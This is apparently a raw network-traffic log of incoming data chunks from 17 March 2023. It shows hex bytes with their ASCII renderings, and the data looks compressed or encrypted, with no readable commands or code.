2023-03-17 13:34:27 UTC	87	IN	Data Raw: d0 3b f2 8b fc 85 25 81 06 1f f4 18 54 03 a2 00 68 f2 ef dd 9b 4c 13 ed 81 50 d4 98 1e 16 73 a5 8a 28 01 5c ee 5b a3 3f e8 8d 15 27 b2 25 d8 1a a3 7b 05 4d d8 46 38 4a d7 38 8a 5e db 35 9a de c7 7b 9e e7 5c 38 46 d7 e6 6a f0 fb c1 5d d7 c7 98 cf c8 71 e8 47 42 ff 8b 47 c9 cd 83 e3 4e cd 4b 7d 13 0f 07 e5 16 5e 56 4e 25 b5 ef bc 26 33 3d ea c6 20 58 6a bf 7c 07 11 c3 80 ea 92 b1 f3 78 eb 69 43 c2 9c 97 ce a6 af c2 37 e4 0d 3b 6f f5 44 e8 a7 7e 3d c3 aa a4 d2 13 b0 35 63 e3 15 71 25 19 7a 9f e5 41 b4 0e 66 eb 70 2d 27 2b 01 1c 52 3a 07 f4 9c ef 08 fb d7 ff 92 cc 20 b9 ad 1b 09 05 50 e2 f4 5d 39 1d 13 21 c4 7d 19 87 da ce 59 d4 e9 5c 52 ce 99 94 07 00 f9 c6 ef 88 df 8d 54 ae d3 c0 9d a0 8f cf e7 97 42 2d 07 fe cb 71 5e 6d 05 ef f8 23 4b b3 a3 f4 68 59 ab e4 Data Ascii: ;%ThLPs(\[?'%{MF8J8^5{\8Fj]qGBGNK}^VN%&3= Xj\|xiC7;oD~=5cq%zAfp-'+R: P]9!}Y\RTB-q^m#KhY
2023-03-17 13:34:27 UTC	89	IN	Data Raw: bc 79 ee 09 7a 10 32 b1 79 c8 68 fe d5 04 d3 15 98 28 67 9d dc ae 68 fc 94 1d 5d b1 df 8b 24 df 70 ca e8 eb 3e 7d 4b e3 02 b5 0e 46 5c b1 9a 32 52 41 7a 59 a7 54 ce cc cf aa 4e a9 aa 9e a1 58 1e 57 63 d3 f9 bc 4a 99 ed 13 93 a4 88 94 1e 75 1a 8c dc 8e b1 7a bd 58 04 6c e5 12 0e c1 8f ee cd f7 af 5a b9 37 9d 48 bc 86 7b da c5 fa c6 3f 70 50 8e 47 80 3f 2e d4 26 4a d0 f0 4f 0e 9c 27 3d 4e a8 0f 9a d2 3f 48 64 23 e0 2a 8d 71 d8 04 bc de 0a 87 37 1a a3 14 d3 dc 44 56 a4 fa 6e 18 76 62 95 c2 14 69 14 d5 34 e7 d7 9d 29 46 5f b9 18 f1 c8 bb 5f b3 4d 20 c8 c1 30 57 6d de 17 45 73 11 41 ac 40 a9 35 80 f1 62 12 aa 1b 8d b3 fc e3 81 6d 9d ff e1 95 46 ae ef da 9e 91 20 6b 26 e5 3a 11 0f 3e 77 43 55 bc 2b 4a 15 20 77 bd 5e b0 8f 31 fd 13 6c f8 f7 6c ef 68 f6 3c 02 5f Data Ascii: yz2yh(gh]$p>}KF\2RAzYTNXWcJuzXlZ7H{?pPG?.&JO'=N?Hd#*q7DVnvbi4)F__M 0WmEsA@5bmF k&:>wCU+J w^1llh<_
2023-03-17 13:34:27 UTC	90	IN	Data Raw: 3f d8 ab 9d ce 1b da 19 6e fe 24 6a 36 1a 61 e5 c3 6e b0 1f 60 d2 6d 2c 01 21 05 0f 7e 26 12 9b bd 96 28 ea c6 c2 ce f1 3f b2 ba 06 21 12 0c db e3 2f 03 31 12 3a c0 76 0c e6 e8 d3 44 b9 e6 5c 4f ca c8 c5 39 11 e5 db ce 8d b5 bc 58 98 f7 dd 8d fb de ee f2 91 44 31 60 b9 e9 60 6f 51 15 f1 f2 24 58 a4 a9 d5 1c 6a a1 fe 80 6a 3b 1f 6c 27 0b 44 e0 27 88 07 a8 92 29 98 ec 32 38 4d a9 32 ab d9 bd 9c b5 c0 07 4d 69 40 52 3f ba 48 eb 85 a3 d5 f4 b5 60 39 71 b5 71 72 21 1c e1 a0 ab 9f 53 ac cc f3 e5 ea ee c3 b0 18 79 21 6e c1 06 54 95 6b 63 aa 87 64 c7 65 58 57 8c de 4c 75 5a e5 b4 8d a8 d5 57 e5 ef 74 3c 75 b3 ed ac fe f4 2d ce 4c ac 7c 44 90 59 6f 96 92 72 7b 43 9c ae 61 c0 7d 46 29 f8 7e 74 a1 a0 5d e5 88 e1 53 61 24 fa 07 e8 b1 26 db 64 9c cf 7b f4 58 40 ab c8 Data Ascii: ?n$j6an`m,!~&(?!/1:vD\O9XD1``oQ$Xjj;l'D')28M2Mi@R?H`9qqr!Sy!nTkcdeXWLuZWt<u-L\|DYor{Ca}F)~t]Sa$&d{X@
2023-03-17 13:34:27 UTC	91	IN	Data Raw: 1c a5 67 fb d7 4e 19 87 e0 7b 17 6b 01 b5 d2 19 74 35 b3 37 f7 ca 87 29 4f 3e 98 1d fa cd a6 38 8b 5e 2f dd cf 3a 54 08 e3 1a 74 66 07 49 cd 65 af 3f 81 e4 0e 38 bf 14 9a bb e7 e8 ef 5f 90 e9 da 92 41 e5 db cb fc ec 06 6a 20 fe 2b 06 55 22 70 5b 59 be 33 23 3b 20 71 b3 54 aa c0 1a f9 02 6a fe 96 42 fa 6f f8 35 67 61 8f c5 e8 c4 11 b2 eb dd 00 52 63 95 37 b3 20 3a 62 6d f8 08 90 4a 19 1f 1c e5 9a f5 65 33 70 69 70 8e d8 4c de e5 62 31 e4 ed ca 38 bf a7 7a 93 0c 21 fb 4f 28 97 74 29 50 7a 55 cb 70 6f 81 dc 5c c9 8a 8c 92 32 90 2a 24 d7 18 5d 0a ba 69 7d e7 b0 eb 8a 46 1a 84 b1 50 da fd 02 00 1f ab 9b 5c 09 74 f3 4a 88 1f fc c8 21 2f b5 51 f2 16 94 7f 11 76 be 21 3e 5c dc 1d 88 38 ca 22 a2 cb a0 32 ab f5 42 56 44 e9 e4 19 d6 ee c6 29 f6 cf da fe c7 62 f9 43 Data Ascii: gN{kt57)O>8^/:TtfIe?8_Aj +U"p[Y3#; qTjBo5gaRc7 :bmJe3pipLb18z!O(t)PzUpo\2*$]i}FP\tJ!/Qv!>\8"2BVD)bC
2023-03-17 13:34:27 UTC	92	IN	Data Raw: 14 60 be 78 76 3a 14 e1 c1 92 99 5e fc df e4 91 dc c1 e3 b7 0f 14 04 70 d9 76 71 89 64 64 c3 a4 71 cd 11 7f 56 cd f9 4e 57 52 fb a2 fe 90 d3 55 f2 a3 7a 3b 73 8d dd ba 8b dc 3b d8 29 ad 7c 45 90 57 6e 80 f4 61 30 61 aa 89 7b d5 70 68 18 e3 6e 64 e6 87 59 ff ac e7 5b 7d 56 ce 7e fc a6 21 e9 75 8b fd 7b e5 58 50 df ea 77 60 a6 c0 fa d1 66 19 cc 9b 98 14 35 cc 8a a5 58 58 d2 de 01 88 df b9 17 64 45 e3 6c d1 31 e2 72 a3 23 24 e6 90 d3 b1 fc 8d 3d 2e a6 ba 3f 67 0c 2e 32 47 22 d2 75 56 76 15 bd 65 7d ad 4f a7 18 d1 25 4d 20 46 87 6d f7 79 f5 b8 43 ee 3c 9e 33 15 93 cd a3 37 ea 9a 1f 4c ad b1 c9 24 c2 79 c3 da de 34 64 48 f2 1f a0 0e 5a 28 8e f3 1c 74 7c 73 4c bd 07 f8 c1 ec ac 44 b4 e1 af ba 4c 6e 4b 68 c2 c8 98 75 99 f1 0f ff c3 9b 94 0f 4c 0f 8d a4 ba d0 54 Data Ascii: `xv:^pvqddqVNWRUz;s;)\|EWna0a{phndY[}V~!u{XPw`f5XXdEl1r#$=.?g.2G"uVve}O%M FmyC<37L$y4dHZ(t\|sLDLnKhuLT
2023-03-17 13:34:27 UTC	93	IN	Data Raw: 5d 27 40 ef 07 c9 8b 2d d4 f2 47 bd fd b8 0e 9b 0a d4 8d 34 2f b6 71 5d 49 7b 57 05 c6 d0 76 e2 fc fe 1b d2 d7 19 ef 4a 67 b5 a1 7c 14 b0 68 67 96 fe 73 07 5b b3 e1 a8 a1 f4 64 b7 00 8d b5 d6 6d 89 0d 97 67 ae 92 bd 03 81 d5 28 45 d0 0c ca 3d 8b 77 62 3d a9 65 86 e9 9a c8 04 3c 85 1c 3f 65 98 60 25 b6 da 45 b6 3c ef 88 48 5d f2 46 be 35 2d c9 3e f4 b1 be c4 bf 0d 16 cf b1 d6 d6 69 74 66 d9 8a fd 58 20 4e d8 f1 6a c7 fe 94 69 51 34 22 6e 7e ae 1c 69 ed 05 07 77 36 1a 43 42 ec 30 87 e4 ff b2 e2 3f 2e 90 b3 3f 52 3e 3a e3 21 7c e1 37 cb c9 c5 90 a6 54 5b 8e 1b ef 12 70 9e df f1 ab d9 c6 eb f2 ae 65 cf 72 ee 0c 6c 36 53 21 e8 07 7f bc f5 60 97 3c 0e cb f2 e4 b5 c8 c6 c4 ef 87 d7 53 89 04 44 82 9c 65 3e 77 c5 74 64 10 3c 2b 61 01 98 0f 12 03 2f 07 bb 44 0e 0c Data Ascii: ]'@-G4/q]I{WvJg\|hgs[dmg(E=wb=e<?e`%E<H]F5->itfX NjiQ4"n~iw6CB0?.?R>:!\|7T[perl6S!`<SDe>wtd<+a/D
2023-03-17 13:34:27 UTC	95	IN	Data Raw: e2 7b 08 e9 cd c2 e6 95 b7 4b 7f bb 90 83 b0 52 e0 a2 1c a2 d2 96 02 f1 f5 ea 88 7a d0 3a d9 0c d5 a4 26 aa 7b d7 cc 11 33 61 e0 33 f7 2d e7 6f 74 3f 55 68 9c b3 61 0b 8f ab d6 35 1a 08 f7 28 82 4f 3d cf d8 b1 b7 f9 53 8c 01 b5 79 5f ef 6e 6b 62 73 da d1 85 d5 2b 97 2d b2 47 66 c9 42 65 73 4c b8 98 a0 7f dc 0f 7e f2 60 e4 9d 90 db 96 9d 38 ea 4c 26 83 1a 8d 5d a8 7d bd 39 7b e5 be 61 29 6d d7 da 95 04 8a 4e bc d2 24 26 e1 12 6b af c5 16 ea f3 e0 49 b6 04 a1 87 8a fc db 6a e7 43 cd 0c bd 22 9d 88 7a dd ab 4d 0e 51 0b 8e 93 7a 8a f1 cb a2 27 21 06 ad a5 bc 4a 67 49 35 06 f2 86 a4 41 bd 32 68 4d 38 1f a8 9f 18 47 e0 84 a8 3e a8 a9 07 9b 93 3f 6d 35 c7 63 27 c8 e4 d0 ad 68 35 2c 30 5d 94 0b 33 28 36 b4 80 49 06 51 1c bf a6 06 5e d5 65 e8 c3 d9 82 d4 7d fd e0 Data Ascii: {KRz:&{3a3-ot?Uha5(O=Sy_nkbs+-GfBesL~`8L&]}9{a)mN$&kIjC"zMQz'!JgI5A2hM8G>?m5c'h5,0]3(6IQ^e}
2023-03-17 13:34:27 UTC	96	IN	Data Raw: 2c d3 f3 16 07 77 36 1b 76 76 fb 8d 8c e3 d2 65 a0 5e 5c c5 e5 77 66 cd 55 fc 37 93 b2 37 8e a7 f9 9a ac 58 5b aa d5 b2 94 5c a6 9e dd 30 b8 d3 3b 82 ef 2a 77 5c d6 43 15 4c 14 9e 1f 1b 4d 99 dc c4 ab 0d 4f 87 4a b0 e5 9c 08 e0 c2 0b 06 7f 9f b9 62 94 c3 30 25 67 da a0 32 6c 28 ef 00 5b d7 54 12 76 5f 7c 07 26 50 4c 2b 20 b3 5b ef d1 be f6 c9 9c c2 b0 b8 51 03 26 f3 94 7f 43 40 1c b5 d4 be 81 b2 bc 36 bc 58 c8 61 15 4a 37 18 b2 f5 f0 36 f9 21 07 74 30 58 a5 b1 86 7d df 99 ed 27 f7 15 3e 6f b4 44 7a fd db f6 7f 98 c7 d4 bd 3a a0 09 7b 9c 2f 2b 6e 5a 3e 42 19 0a c3 79 b0 93 70 d5 d3 43 b5 c8 23 1a b4 b4 cf 85 f6 05 6a b2 83 b2 51 72 fe 0b 3d e6 37 31 84 9a 93 00 12 69 8b 59 db 60 d1 0e aa 9a 0d 89 a1 15 49 ac 55 dc 57 14 ba 65 af 53 8c 21 17 c4 2a 00 bf 2a Data Ascii: ,w6vve^\wfU77X[\0;w\CLMOJb0%g2l([Tv_\|&PL+ [Q&C@6XaJ76!t0X}'>oDz:{/+nZ>BypC#jQr=71iY`IUWeS!*
2023-03-17 13:34:27 UTC	97	IN	Data Raw: 92 c7 b9 06 6a f2 e3 b9 82 17 81 4b 18 7d c0 5e 38 c1 32 db 94 5b dc 63 06 2a 6d 31 16 f1 cb a2 cf 42 78 cb 06 95 6a da 71 1b 54 a7 b7 c9 29 cd 51 18 d2 ed 42 e6 db 6c 0e 8d 9b b0 3b 6e f2 85 ab b3 6e ba 6f b5 5d 2d d7 cc d0 a5 42 09 29 6a 1b b3 26 05 7e 6c 93 80 4b 0c 5b 2e 9c b6 f9 45 e4 8e bd d5 12 f8 95 32 f8 9e 88 db Data Ascii: jK}^82[c*m1BxjqT)QBl;nno]-B)j&~lK[.E2
2023-03-17 13:34:27 UTC	97	IN	Data Raw: 8e 3b 8e 63 64 e4 2b 67 48 4e 3c e0 24 bc 76 ed bf e7 76 13 9c 6d f2 59 5c 21 92 d3 91 34 e9 32 cb 4f ce 96 46 c3 31 df a3 ce d1 49 4d 81 c3 f9 e8 f9 9a 22 20 c6 26 3d f9 b3 11 8c 60 e9 2f 73 d7 09 b0 e7 35 d4 cf 43 5a 88 8a b3 86 00 f7 b8 7d 72 b5 45 79 35 f5 89 5f 9a d3 0f ab 93 ae 7d 8d 95 2e ef 41 4d 8b 99 52 6f fb 10 2d d4 a4 ca c2 2b c5 b1 aa 27 fb 54 b5 1d 59 e0 46 04 ce 7e cb 7a d1 e5 e9 15 c0 8e 91 83 97 7c b1 14 ea 1c 1e 77 f2 3f 3f 3b e8 89 7e 0f 8d 39 0f 59 91 16 7f 0f 9b 92 cd 1c e8 93 5f 4b f5 70 be 38 2f d4 1b e6 a8 ae d3 bc 3b 16 ff 8c 84 b7 70 5f 5b 8b e5 ee 5b 16 4e f7 c2 b4 ea ff f6 04 32 30 fd 0d 39 d4 27 8f 97 09 21 53 57 71 cc 6f c4 62 dc e1 80 0d 9c 49 4b cc e7 ac 1b 58 91 a5 26 a0 a7 56 d8 18 1a a7 b1 ae 45 b1 09 c7 12 4c a9 92 ea Data Ascii: ;cd+gHN<$vvmY\!42OF1IM" &=`/s5CZ}rEy5_}.AMRo-+'TYF~z\|w??;~9Y_Kp8/;p_[[N209'!SWqobIKX&VEL
2023-03-17 13:34:27 UTC	98	IN	Data Raw: 9d fd 9b 0a 7e 75 70 ae 1b 9f 01 06 af 54 96 dc 14 38 05 da 12 f4 f8 7c a1 93 2c 43 f6 8f f8 08 46 71 63 db 05 07 8b 68 0f d8 af b4 ff 2a e0 2f b0 28 ad 35 9c cb 83 18 05 7f 4d 6c 81 a0 1b 67 8f 9d c0 5b 86 be a4 24 b5 b9 a6 d8 2b 82 fc 77 83 d2 9c 08 fd f0 c2 2b 01 a4 6b b2 2d d5 80 2e c5 12 f9 da 2b 2f 1f 85 40 48 d2 38 07 0b 59 ca 6b 8c 76 1d 76 ee ad 18 6f ce 7d b8 b2 b7 6f 68 9b 83 e1 b5 81 c9 85 1c 58 2f 42 e5 55 4a 68 21 8a d3 38 cb 3a 7a 5b 9b 19 36 cb 29 3f 23 4e d0 1c b8 50 1a 5f 19 ba 0a ed a1 bc 31 7c dd 1c 2e 03 59 0b 18 8b 65 aa 51 9c d3 07 c4 03 69 10 47 e6 a2 e2 6c 8c 1c e9 fc ba c9 92 08 47 a4 2f 11 f5 f4 c8 78 dc 9a 7b f3 e2 80 a6 1c e2 44 f7 08 d7 bc a6 b3 66 88 dd 3b db 00 5c 95 eb e5 44 8f 9e 8c 9f 31 38 ae bc 95 6a da 9e 61 5d 93 a9 Data Ascii: ~upT8\|,CFqch*/(5Mlg[$+w+k-.+/@H8Ykvvo}ohX/BUJh!8:z[6)?#NP_1\|.YeQiGlG/x{Df;\D18ja]
2023-03-17 13:34:27 UTC	100	IN	Data Raw: 3b 7c 27 fe 81 12 a3 cf b2 5f b2 c1 b6 de a0 56 8d 65 26 ee e5 75 c9 d5 e6 c2 11 da 2a 6b 77 66 60 d6 16 62 33 4c 69 b1 9b d9 7f 7a 53 83 af 44 3f 67 ea 22 41 79 86 ad 89 dd d5 d4 16 ed 69 49 a7 8d c8 b1 c8 cc 8e 5e 8d 69 5c 2b b2 40 9c 96 10 3b ac ee cd dd 74 de 7c 69 8a 41 18 10 75 7a e5 ed 02 b0 7e 28 82 3f 43 6b 5f 6b 7b 31 54 23 f4 a3 96 12 8f d7 92 d2 9e 21 d7 f9 72 2d 60 2e b4 ab 2f 6a 74 7c 4a a0 13 74 87 9c a1 75 b9 c4 3d 54 ab c1 a0 20 74 f9 af f8 ef ff d9 75 ec d3 b3 95 96 de 9c a9 e5 0b 43 60 e5 cf 14 45 3f 15 9c f9 56 4d d0 b4 a7 65 2b 81 8a 86 1c 3e 6b 66 55 31 6a a3 53 e7 6e fa bc 2f fb ff 5d 23 4d 85 40 a0 b8 e9 f9 bf a5 05 3f 7d 30 43 50 f2 48 88 f7 c6 af d2 d0 40 57 75 c7 61 02 3a 73 fd a0 c2 f1 64 fc d7 81 81 83 e5 90 fe 6a 59 66 1c ad Data Ascii: ;\|'_Ve&u*kwf`b3LizSD?g"AyiI^i\+@;t\|iAuz~(?Ck_k{1T#!r-`./jt\|Jtu=T tuC`E?VMe+>kfU1jSn/]#M@?}0CPH@Wua:sdjYf
2023-03-17 13:34:27 UTC	101	IN	Data Raw: 97 a1 07 98 89 4f ff bf cc f1 7c 5d 7d 94 dc b4 d0 66 d3 28 4e 67 8c 4f 0e 94 ea 9a 9f fa fc 60 dc 24 ee 42 d3 83 7b da b2 b3 b9 1b 1f 6a eb 54 f3 35 41 d1 26 44 b5 e7 10 1d f9 55 5f 64 c7 07 9a c8 5a 5d 3b 31 85 35 fe 71 b7 04 bc 9d 74 aa 41 19 d1 0e ba d2 2a 23 e5 ee 1e 1d 1f 75 f4 b6 70 45 7a b3 67 f7 a4 87 4c 4e 71 8e 77 9f bf 91 38 a0 3f 28 bc c6 5f 5c 6d f9 6e 05 07 46 2c 82 0a 86 5a 8e 90 6f 7b a7 7a c0 da a6 8d 81 2f a7 8c f9 f0 4a 80 cf bf c5 bf 46 08 37 8c 2c 65 21 62 51 31 50 dd 22 23 0e 41 6d d4 54 de fd 78 93 76 4a 8a fa 0f fe 01 f8 52 6c 0c 8f ab ee 8b 40 d8 8e af 30 52 75 f0 25 ec 04 4f 61 07 e9 6b 87 4a 24 71 6c 9c b1 81 76 50 74 69 0f e7 81 29 99 8f 52 31 de 8c ce 5d c1 c2 3b 93 00 58 b8 3b 4d eb 1f 67 56 0e 30 9b 7f 0b b4 b5 52 a1 90 8c Data Ascii: O\|]}f(NgO`$B{jT5A&DU_dZ];15qtA*#upEzgLNqw8?(_\mnF,Zo{z/JF7,e!bQ1P"#AmTxvJRl@0Ru%OakJ$qlvPti)R1];X;MgV0R
2023-03-17 13:34:27 UTC	102	IN	Data Raw: 54 27 8b ea 81 bd df 8f 3b a5 b2 f0 f8 d3 bb 9c 98 b6 2b 2d 60 91 8c 66 2a 4b 60 9c 9a 05 39 a0 c6 cf 1c 42 c2 e4 e9 64 5a 6b 0c 06 0b 1d 83 36 e7 10 a8 cc 4a c2 98 68 4a 4d fd 13 ce e1 c9 b4 f1 f5 64 6d 10 7f 26 08 c8 11 a8 a4 c6 e2 80 93 25 57 1f 93 08 60 55 00 93 c3 e2 90 27 92 b8 81 e2 d7 80 f3 c4 0b 79 66 13 f4 76 58 fc 7b 10 98 d4 30 b4 28 3d 02 a2 9b 2a 40 3d ef db 8d dc 8e 34 bb ef 5d 59 75 ec ae d2 df 9a 2c bd 3e e1 78 27 8b 36 52 f9 b1 06 01 15 f5 d6 42 a1 74 04 3c 8b 2e 17 ba e4 38 9c b7 82 53 12 50 b7 0a bf a6 44 e9 01 97 b9 12 98 6b 33 d8 85 66 19 c7 b4 f5 b3 3e 7c a3 fe f6 6f 11 b5 f9 d6 4c 34 d8 aa 0b d7 df d8 16 10 20 80 65 b4 2c 96 68 da 54 76 ea f7 d4 c2 bb ff 76 2e c9 c7 36 22 0e 5b 20 2b 3f a6 6d 56 6d 65 e2 3d 44 c8 5b d2 1b bd 3f 39 Data Ascii: T';+-`fK`9BdZk6JhJMdm&%W`U'yfvX{0(=@=4]Yu,>x'6RBt<.8SPDk3f>\|oL4 e,hTvv.6"[ +?mVme=D[?9
2023-03-17 13:34:27 UTC	103	IN	Data Raw: b8 cf fc fa 73 66 54 eb 4a 65 2e 20 12 62 3c 9c 47 70 6f 02 03 a1 31 b7 8f 78 88 26 09 fc 96 66 9b 73 99 33 02 22 ea f8 9c f2 73 ab 8e ca 74 20 10 91 43 95 73 4f 05 5f 9d 59 e4 4a 0b 5e 6c d4 f5 a1 00 33 04 01 36 88 b4 40 99 e3 16 54 a8 ac be 72 f8 81 0e b3 5f 01 88 1b 4d d5 5a 29 35 2e 55 b4 11 4f d3 95 3b f8 fe ac f5 78 e4 21 6c 92 71 09 62 ee 69 34 97 cf ae b6 36 13 ed be 39 8e fd 73 70 73 c1 cd 5c 5e 1a f9 3e a3 70 ea 8d 77 46 a4 51 e9 74 a2 1e 7d 59 cd 46 34 28 e5 59 99 5e dc 57 af bf d2 7b 8f 86 67 38 4a bb e8 6a c0 82 c0 29 dd aa c5 9b cf 03 eb 26 52 96 b9 20 be be 8f 97 7f 9d 4e 19 18 66 1e 82 65 10 6f 39 0a d4 ee d9 16 5a 21 8e ca 4e 51 6a 9e 28 37 29 e3 ee fb fd a6 9a 7f 8c 06 24 c9 e8 94 8b ba cc d8 53 e3 63 5c 5e 9f 21 b1 e2 3d 5e 81 ce e0 bc Data Ascii: sfTJe. b<Gpo1x&fs3"st CsO_YJ^l36@Tr_MZ)5.UO;x!lqbi469sps\^>pwFQt}YF4(Y^W{g8Jj)&R Nfeo9Z!NQj(7)$Sc\^!=^
2023-03-17 13:34:27 UTC	105	IN	Data Raw: f4 0c 55 15 98 d0 14 ab 11 09 48 81 17 3a 8f c9 38 be e1 af 36 3f 24 9a 7e 92 d4 69 88 2c ee 94 12 ba 3d 1e ab a8 05 34 a6 99 9b 9e 0a 51 93 d3 f6 4d 47 98 8a fb 29 19 bb 87 64 fa b2 f5 64 3d 20 bc 33 99 5f bb 00 f7 23 5b 83 da ba ef 88 d2 44 03 c9 e7 60 0f 7d 76 53 06 4b 8b 0c 7b 19 48 e2 01 13 e5 3e ff 79 90 4c 14 59 6b d4 39 84 20 90 d4 6e 93 59 fd 41 5b fa 97 da 09 af f7 66 50 d4 c5 8b 13 b0 70 b3 ae 94 6d 10 70 80 04 d0 1f 28 2c f7 cd 5e 37 01 2f 3c 8f 54 c9 b5 ec de 6f c4 d2 dd ea 35 6e 35 4e b6 e5 c8 62 f6 e8 76 8b 8a a9 f1 6d 33 5d e2 f1 c3 f0 13 90 58 22 03 e5 7c 7e a6 88 9a fd b8 9d 0c ae 45 8a 21 f3 e8 37 be dd b3 cf 59 6c 06 cb 35 ba 56 05 ba 06 2d 98 84 30 78 f8 5c 1d 27 93 61 d5 a1 08 3c 3b 40 a5 58 ae 18 d4 6a 9c 9d 2b e9 20 7f bc 67 df b3 Data Ascii: UH:86?$~i,=4QMG)dd= 3_#[D`}vSK{H>yLYk9 nYA[fPpmp(,^7/<To5n5Nbvm3]X"\|~E!7Yl5V-0x\'a<;@Xj+ g
2023-03-17 13:34:27 UTC	106	IN	Data Raw: c7 33 7d 2f be 6b 5b 05 83 74 ed 73 ab 7a ce 92 a0 56 ea ab 3b 15 27 96 81 47 a3 af b2 04 b2 87 b6 b6 a0 2e 8d 0b 26 bb e5 0d c9 93 e6 ba 11 b0 2a 34 77 4b 69 af 16 3d 33 14 69 f9 9b f4 64 77 53 a3 af 63 3f 47 ea 05 41 04 86 c3 89 d0 d5 b7 16 a1 69 09 a7 c5 c8 8a ed ec ad 7e 8d 43 5c 3f b2 40 9c 91 10 2d ac b9 cd d3 74 c2 7c 69 8a 12 18 64 75 5a e5 c4 02 f5 7e 3f 82 3f 43 6a 57 36 7b 5a 54 13 f4 bc 96 0c 8f dd 92 ce 9e 31 d7 aa 72 64 69 2b b4 e2 2f 2f 74 0e 4f ad 20 5e 87 e0 bc 16 b9 f8 3d 4f ab ce a0 3f 74 ee af a1 ef 8b d9 49 ec d3 b3 9b 96 d0 9c f6 e5 59 43 6d fe 86 14 27 3f 6a 9c c7 56 6e d0 e6 a7 60 2b e2 8a e9 13 09 6b 6d 55 6a 6a e8 53 82 75 f8 bc 1d fb 98 54 64 4d 86 40 aa b8 ab f9 f1 ac 0b 3f 7b 30 43 50 a6 48 a8 e0 96 b4 f2 d0 4a 57 66 c7 6d 02 Data Ascii: 3}/k[tszV;'G.&*4wKi=3idwSc?GAi~C\?@-t\|iduZ~??CjW6{ZT1rdi+//tO ^=O?tIYCm'?jVn`+kmUjjSuTdM@?{0CPHJWfm
2023-03-17 13:34:27 UTC	107	IN	Data Raw: 37 45 0a 59 c9 2d 9d 9d bc f7 2b e4 84 bb ce 54 6e 51 0d da 97 ad 07 92 89 56 ff fd cc 98 6d 68 7d 8a dc e3 d0 60 d3 2c 4e 62 8c 08 0e d3 ea e9 92 98 fc 6f dc 2a ee 45 d3 8d 7b 84 b2 c8 a8 69 1f 7b eb 35 73 d5 03 ba 65 2d c7 84 69 78 89 55 3a 27 e9 61 d8 a1 19 3c 49 55 fc 58 8e 18 c3 6a fb 9d 00 e9 35 7f 81 67 c8 b3 45 56 95 8a 7b 74 6d 01 80 b6 04 06 52 d5 4e 9e 84 e9 64 2b 16 fa 12 9f da d2 18 c6 4c 41 d5 a8 25 39 08 8d 47 36 27 74 4a 82 66 c5 33 e2 fc 0e 1e d0 1e f9 fa 93 fa 81 57 e4 f8 95 98 2b a0 b8 cc fc cb 73 69 54 f8 4a 10 21 1e 12 11 3c be 47 4c 6f 25 03 b1 31 e4 8f 03 93 57 09 f7 96 0f f6 43 99 11 02 7e ea d2 9c fb 73 ac 8e 90 74 10 10 b3 43 9e 73 36 00 77 9d 1f e4 0d 4c 14 6c e3 f5 d1 00 22 04 06 36 97 b4 4c 99 f2 16 45 a8 f5 be 75 f8 eb 0e b3 Data Ascii: 7EY-+TnQVmh}`,Nbo*E{i{5se-ixU:'a<IUXj5gEV{tmRNd+LA%9G6'tJf3W+siTJ!<GLo%1WC~stCs6wLl"6LEu
2023-03-17 13:34:27 UTC	108	IN	Data Raw: 91 1b 4a 36 7c 7d ad 52 7e b1 9c 8a 36 8e ab 0b 21 ab 2f 11 07 74 e4 af e7 ef ab d9 4c ec d3 b3 8a 96 de 9c cf e5 66 43 09 fe ef 14 58 3f 0f 9c e4 56 56 d0 a0 a7 68 2b 9e 8a a6 1c 3c 6b 65 55 62 6a e0 53 82 75 f4 bc 7b fb ae 5d 64 4d da 40 92 b8 86 f9 84 a5 10 3f 7c 30 49 50 a7 48 c3 f7 9a b4 d0 d0 57 57 7d c7 6e 02 3c 73 ff a0 87 f1 54 fc e4 81 aa 83 f5 90 b0 6a 15 66 73 a0 19 3c 97 08 4c aa ed 1d 87 11 0a 3a 97 9a 66 14 7b 8b 9d fe ec bc 00 96 de 13 6a 01 dd af f2 8b ab 49 d9 4c d2 15 65 e2 0e 1c c1 f4 47 55 25 f5 ed 14 90 11 34 48 bf 17 55 8f d6 38 d2 e1 b4 36 24 24 80 7e 89 d4 44 83 44 ee d4 12 f6 3d 5a ab e9 05 19 b7 f3 9b d6 0a 08 93 bc f6 19 47 c1 8a b3 29 47 bb aa 73 84 b2 95 64 44 20 c1 33 94 5f c5 00 bf 23 04 83 81 ba a7 88 8d 44 2e c6 84 60 4d Data Ascii: J6\|}R~6!/tLfCX?VVh+<keUbjSu{]dM@?\|0IPHWW}n<sTjfs<L:f{jILeGU%4HU86$$~DD=ZG)GsdD 3_#D.`M
2023-03-17 13:34:27 UTC	109	IN	Data Raw: e8 5a cf 90 23 7b fd 7a d4 da be 8d a1 3e b7 8c fb f0 4a 80 d3 bf 99 bf 53 08 00 8c 38 65 40 6d 71 31 57 dd 22 23 1d 41 23 d4 1c de a2 78 be 67 24 8a bb 0f b6 01 b4 52 2f 0c e7 ab 96 8b 35 d8 e1 be 01 52 7e f0 27 ec 53 4f 46 07 ef 6b 8b 4a 21 71 56 97 d5 81 53 50 74 69 43 e7 c0 29 f7 80 7f 31 c3 8c b3 5d f2 c2 46 93 30 58 fb 3b 39 fa 60 67 15 0e 54 e0 1c 0b d9 b5 16 a1 d3 8c d8 57 c9 75 41 b2 5c 3a 4f ce 44 12 b7 ef fd f2 58 76 8c d2 52 ae 98 51 50 73 96 ef 2e 5e 74 9a 5d ce 1b 8e e8 59 34 c1 71 91 59 c7 33 7d 2f be 6b 5b 05 83 74 ed 73 ab 7a ce b2 a0 71 ea c0 3b 57 27 ce 81 04 a3 e6 b2 09 b2 ec b6 e9 a0 6c 8d 4b 26 ac e5 00 c9 f8 e6 f6 11 f1 2a 72 77 09 69 ec 16 1d 33 33 69 9c 9b b6 64 29 53 fa af 74 3f 4a ea 29 0c 75 86 bd 89 9c d5 f6 16 ed 69 49 a7 bf Data Ascii: Z#{z>JS8e@mq1W"#A#xg$R/5R~'SOFkJ!qVSPtiC)1]F0X;9`gTWuA\:ODXvRQPs.^t]Y4qY3}/k[tszq;W'lK&*rwi33id)St?J)uiI
